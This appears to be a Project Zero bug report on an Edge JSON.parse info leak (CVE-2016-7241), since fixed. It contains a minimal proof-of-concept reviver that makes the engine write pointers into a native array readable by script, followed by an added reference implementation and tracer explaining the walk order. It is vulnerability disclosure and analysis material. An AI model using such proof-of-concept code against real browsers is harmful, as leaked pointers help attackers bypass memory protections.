Monorail project: project-zero
Issue 952 Microsoft Edge: Info Leak in JSON.parse
Reported by natashenka@google.com (Project Member), Sep 22 2016
Status: Fixed
Closed: Nov 2016
There is an info leak in JSON.parse. If this function is called with a reviver, and the reviver modifies the output object to contain a native array, the Walk function assumes that this array is a Var array, and writes pointers to it. These pointers can then be read out of the array by script.

A minimal PoC is as follows:

var once = false;
var a = 1;

// Reviver: on its first call, replace element 2 of the holder (the [4, 5]
// sub-array that Walk has not visited yet) with a fresh native array, then
// return an empty object for every element it is asked about.
function f() {
    if (!once) {
        a = new Array(1, 2, 3);
        this[2] = a;
    }
    once = true;
    return {};
}

JSON.parse("[1, 2, [4, 5]]", f);

A full PoC is attached. When loaded in a browser, this PoC will display pointers in an alert dialog.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Attachment: j.html (558 bytes)
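The mechanism behind the report is the order in which JSON.parse's internal Walk visits the parsed tree: the reviver is called bottom-up with the holder as `this`, so a reviver that assigns to `this[2]` on its first call swaps out a sibling that Walk has not reached yet, and Walk then has to deal with a value of whatever type the script chose. The following is an added example, not code from the report or from the Edge code base: a reference implementation of the spec's reviver walk (InternalizeJSONProperty), which re-reads `holder[name]` and re-checks whether it is an array on every visit instead of assuming anything about values it saw earlier, plus a tracer that records the sequence of reviver calls with and without the sibling swap. The input string, the `[4, 5, 6]` replacement and the names `internalize`, `parseWithReviver`, `traceReviver` and `demo` are constructed for this example.

```javascript
// Added example (not from the report or the Edge code base). Reference
// implementation of the spec's reviver walk plus a tracer that records the
// (holder, key, value) sequence a reviver observes, optionally with a reviver
// that swaps a not-yet-visited sibling for a fresh native array.

// Spec InternalizeJSONProperty: re-read holder[name] and re-check its type on
// every visit, so a value the reviver swapped in is walked on its own terms
// rather than under an assumption made before the reviver ran.
function internalize(holder, name, reviver) {
  const val = holder[name];
  if (val !== null && typeof val === 'object') {
    let keys;
    if (Array.isArray(val)) {
      keys = [];
      for (let i = 0; i < val.length; i++) keys.push(String(i)); // length read once
    } else {
      keys = Object.keys(val);
    }
    for (const k of keys) {
      const elem = internalize(val, k, reviver);
      if (elem === undefined) delete val[k];
      else val[k] = elem;
    }
  }
  return reviver.call(holder, name, val);
}

// Reviver-capable parse built on the reference walk above (assumed name).
function parseWithReviver(text, reviver) {
  return internalize({ '': JSON.parse(text) }, '', reviver);
}

// Record each reviver call as "holderKind[key]=value". When `mutate` is set,
// the first call replaces this[2] (the [4, 5] sibling Walk has not reached
// yet) with a fresh three-element native array, as the report's PoC does.
function traceReviver(text, mutate, parse = JSON.parse) {
  const trace = [];
  let done = false;
  parse(text, function (key, value) {
    const holder = Array.isArray(this) ? 'arr' : 'obj';
    const shown = Array.isArray(value) ? `len${value.length}` : String(value);
    trace.push(`${holder}[${key}]=${shown}`);
    if (mutate && !done) {
      done = true;
      this[2] = [4, 5, 6]; // constructed replacement for the unvisited sibling
    }
    return value;
  });
  return trace;
}

// Constructed input: the same document the report's PoC feeds to JSON.parse.
const SAMPLE = '[1, 2, [4, 5]]';

// Three traces: the untouched walk, the walk with the sibling swap under the
// engine's built-in JSON.parse, and the same swap under the reference walk.
function demo() {
  return {
    plain: traceReviver(SAMPLE, false),
    mutated: traceReviver(SAMPLE, true),
    reference: traceReviver(SAMPLE, true, parseWithReviver),
  };
}

if (typeof module !== 'undefined' && require.main === module) console.log(demo());
```

In the mutated trace the walk descends into the swapped-in array and reports three elements under key 2 instead of the two that were parsed, which is the point at which an implementation that cached its earlier view of element 2 (as the report says Edge's Walk did) would be operating on an object of the wrong type. A spec-shaped walk is the check to compare against: whatever an engine optimises, the observable call sequence must match it.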
Comment 1 by natashenka@google.com (Project Member), Nov 10 2016
Labels: CVE-2016-7241
Status: Fixed

Comment 2 by natashenka@google.com (Project Member), Dec 1
Labels: -Restrict-View-Commit

Comment 3 Deleted